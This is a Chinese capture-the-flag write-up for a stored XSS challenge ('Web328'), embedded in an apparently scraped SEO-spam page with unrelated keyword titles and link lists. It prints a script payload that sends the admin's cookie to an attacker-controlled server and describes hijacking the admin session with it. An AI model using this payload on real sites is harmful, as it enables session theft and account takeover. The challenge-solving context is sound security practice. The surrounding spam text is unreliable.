当前位置: 首页 > news >正文

黄村网站建设费用口碑营销例子

黄村网站建设费用,口碑营销例子,google企业网站seo,海南住房与建设厅网站Web328 简单阅读一下页面。 是一个登录系统,存在一个用户管理数据库。 那么我们注册一个账号,在账号或者密码中植入HTML恶意代码,当管理员访问用户管理数据库页面时,就会触发我们的恶意代码。 思路 我们向数据库中写入盗取管理员…

Web328

简单阅读一下页面。
是一个登录系统,存在一个用户管理数据库。
那么我们注册一个账号,在账号或者密码中植入HTML恶意代码,当管理员访问用户管理数据库页面时,就会触发我们的恶意代码。

在这里插入图片描述

在这里插入图片描述

思路

我们向数据库中写入盗取管理员Cookie的恶意代码,然后利用管理员Cookie跳过账号密码验证,直接登录管理员界面即可。

在注册页面,把script、body、svg、img标签都试一下,看看哪个能成功获取到Cookie。
最后使用script标签成功了。
账号和密码都输入下面的payload:

<script>location.href="http://xx.xx.xx.xx/flag.php?cookie="+document.cookie</script>

然后在登录界面登录一下,就会发现自己服务器获取到了管理员的cookie

这时候我们访问用户管理界面并抓包,将自己的Cookie修改为管理员的Cookie,页面会显示 欢迎你,admin
但是此时下面的用户名和密码还没有出现。我们需要继续抓包,发现又会抓到一个关于下面内容的包,将这个包的Cookie也改为管理员Cookie,我们才能成功获取flag。
在这里插入图片描述得到flag。

这里的管理员cookie更换的频率挺快的,能不能登录有点看运气,不知道有没有更稳定的方法/

http://www.hrbkazy.com/news/30186.html

相关文章:

  • 速成网站-google官方下载
  • 网站的费用搭建一个app平台要多少钱
  • 网站开发价格多少市场营销手段有哪四种
  • 望都网站建设新闻软文自助发布平台
  • wordpress安装好之后怎么用北京优化网站公司
  • pc门户网站是什么意思百度关键词优化快速排名软件
  • 鑫企点外贸软件靠谱吗seo搜索优化待遇
  • 电子商务网站设计与开发案例教程预测2025年网络营销的发展
  • 国内 设计网站的公司网站本地免费发布信息网站
  • 怎样做境外网站软文代写新闻稿
  • 外包小程序开发的价格seo代理
  • 做公司网站哪里好seo技术交流
  • 郴州网站设计厦门seo网站推广
  • 工程建设管理条例魔方优化大师官网
  • 张家港网站设计优化googleplay官网
  • 对比色的网站宁波seo优化报价多少
  • 网站二次备案淘宝app官方下载
  • 网站关键词选择线上销售的方法和技巧
  • 找网站开发公司百度竞价推广点击软件
  • 房产集团网站建设对搜索引擎优化的认识
  • 兰州网站怎么建设营销型企业网站有哪些
  • 浙江省城乡建设厅网站首页如何推广网站运营
  • 网站有了订单邮箱提醒代码百度推广介绍
  • 广安门外网站建设windows优化大师在哪里
  • 淮安做微信网站词语搜索排行
  • 台州网站排名优化seo搜索排名优化方法
  • 百度上传网站服务器网站运营优化培训
  • 北京互联网网站建设2022智慧树互联网与营销创新
  • 明年做哪个网站致富推广下载app赚钱
  • 怎样注册自己的货运网站免费注册网站有哪些